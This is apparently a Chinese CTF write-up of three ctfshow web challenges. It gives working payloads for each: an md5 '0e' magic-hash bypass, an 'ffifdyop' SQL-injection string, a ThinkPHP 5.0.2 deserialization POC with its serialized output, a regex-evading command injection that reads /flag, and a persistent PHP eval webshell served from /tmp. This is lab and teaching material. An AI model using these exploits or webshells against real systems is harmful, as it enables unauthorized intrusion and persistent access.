web签到
<?php //Author:H3h3QAQ include "flag.php"; highlight_file(__FILE__); error_reporting(0); if (isset($_GET["YBB"])) { if (hash("md5", $_GET["YBB"]) == $_GET["YBB"]) { echo "小伙子不错嘛!!flag给你了:" . $flag; } else { echo "偶吼,带黑阔被窝抓到了!!!!"; } }
虚假的poc
for($a=1;$a<10000;$a++) { if (hash("md5", $a) == $a) { echo $a.PHP_EOL; echo hash("md5", $a); break; } }
92
92cc227532d17e56e07902b254dfad10
脚本跑出来的92是int类型,而我们get传参进去是str类型,此时比较不成立。因此92是行不通的
真正的poc
<?php $str="0e"; for($i=0;$i<=10000000000;$i++){ $md5 = $str.$i; if (hash("md5",$md5)==$md5){ echo $md5; break; } } <?php for($i = 0; $i <= 10000000000; $i++) { if (hash("md5", "0e".$i) == "0e".$i) { echo "0e".$i; break; } }
需要传入0e215962017
自身与md5相等
0e215962017,md5后也是以0e开头
因此传入后拿到flag
双重md5下的0e绕过
以下字符串进行两次md5后以0e开头
7r4lGXCH2Ksu2JNT3BYMCbDLytmyGm2xQyaLNhWn770hQgrBOjrcqftrlaZk
md5 + SQL注入
使用ffifdyop,先md5再hex2bin后变成了'or'6�]��!r,��b,绕过SQL注入
eztp
代码审计
<?php namespace app\index\controller; class Index { public function index($run=[]) { highlight_file(__FILE__); echo '<h1>Welcome to CTFSHOW</h1></br>'; echo 'Powered by PHPthink5.0.2</br>'; echo dirname(__FILE__); if (!empty($run[2])){ echo 'ZmxhZyBpcyBub3QgaGVyZSBidXQgaXQgaXMgaW4gZmxhZy50eHQ='; } if (!empty($run[1])){ unserialize($run[1]); } } // hint:/index/index/backdoor public function backdoor(){ if (!file_exists(dirname(__FILE__).'/../../'."install.lock")){ echo "Try to post CMD arguments".'<br/>'; $data = input('post.'); if (!preg_match('/flag/i',$data['cmd'])){ $cmd = escapeshellarg($data['cmd']); $cmd='cat '.$cmd; echo $cmd; system($cmd); }else{ echo "No No No"; } }else{ echo dirname(__FILE__).'/../../'."install.lock has not been deleted"; } } }
ZmxhZyBpcyBub3QgaGVyZSBidXQgaXQgaXMgaW4gZmxhZy50eHQ= flag is not here but it is in flag.txt
这里记录一下,由于靶场没有配置隐藏入口文件,所以需要加上index.php进行访问
http://b756b813-79f6-4683-a477-5a70667dd38e.challenge.ctf.show/index.php/index/index/backdoor
通过backdoor得到执行命令,需要先删除install.lock,查看PHPthink5.0.2的反序列化漏洞
POC
<?php namespace think\process\pipes; use think\Process; class Pipes{} class Windows extends Pipes{ private $files = []; function __construct(){ $this->files = ["/var/www/html/application/index/controller/../../install.lock"]; } } echo urlencode(serialize(New Windows()))."\n"; ?>
O%3A27%3A%22think%5Cprocess%5Cpipes%5CWindows%22%3A1%3A%7Bs%3A34%3A%22%00think%5Cprocess%5Cpipes%5CWindows%00files%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A61%3A%22%2Fvar%2Fwww%2Fhtml%2Fapplication%2Findex%2Fcontroller%2F…%2F…%2Finstall.lock%22%3B%7D%7D
$data = input('post.'); if (!preg_match('/flag/i',$data['cmd'])){ $cmd = escapeshellarg($data['cmd']); $cmd='cat '.$cmd; echo $cmd; system($cmd);
这里escapeshellarg会给cmd加上引号,导致通配符*失效,必须完整赋值flag才能成功读取
cmd=/fl%97ag cat '/flag' ctfshow{6561934e-d3cb-466f-93b9-4c22bb4a8af8}
这里特殊字符的编码完美避开了正则,同时编码后也不影响linux执行命令读取flag
不要离开我
<?php // 题目说明: // 想办法维持权限,确定无误后提交check,通过check后,才会生成flag,此前flag不存在 error_reporting(0); highlight_file(__FILE__); $a=$_GET['action']; switch($a){ case 'cmd': eval($_POST['cmd']); break; case 'check': file_get_contents("http://checker/api/check"); break; default: die('params not validate'); } params not validate
思路,在其他目录下写入后门,然后check后开启php内置服务器访问后门getshell,这里需要进行延时处理
cmd=file_put_contents("/tmp/index.php","<?php eval(\$_POST['1']); ?>"); cmd=system("cat /tmp/index.php");
这里需要\转移一下,另外查看文件需要查看源码,不然会被直接解析
cmd=system("sleep 10 && php -S 0.0.0.0:80 -t /tmp/");
payload,这里可以分开,也可以合并为一句payload
cmd=file_put_contents("/tmp/index.php","<?php eval(\$_POST['a']);?>");system("sleep 10 %26%26 php -S 0.0.0.0:80 -t /tmp/");
迅速提交check请求生成flag,然后直接访问即可通过后门cat /flag_ssk.txt
